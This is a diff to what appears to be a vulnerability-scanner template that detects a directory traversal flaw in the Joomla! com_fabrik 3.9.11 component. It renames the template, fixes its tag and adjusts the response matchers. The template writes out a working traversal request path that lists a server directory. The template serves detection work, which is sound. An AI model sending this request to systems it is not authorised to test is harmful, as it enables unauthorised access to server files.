--- a/vulnerabilities/other/joomla-com-fabrik-lfi.yaml
+++ b/vulnerabilities/other/joomla-com-fabrik-lfi.yaml
@@ -1,25 +1,26 @@
-id: joomla-lfi-com_fabrik
+id: joomla-com-fabrik-lfi
 
 info:
   name: Joomla! com_fabrik 3.9.11 - Directory Traversal
   author: dhiyaneshDk
   severity: high
-  tags: joomla,sqli
+  tags: joomla,lfi
   reference: https://www.exploit-db.com/exploits/48263
 
 requests:
   - method: GET
     path:
       - '{{BaseURL}}/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../tmp/'
-    headers:
-      User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55"
+
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - '[{"value"'
+          - '"value":'
           - '"disable":false'
+          - 'text'
         part: body
+        condition: and
 
       - type: status
         status:
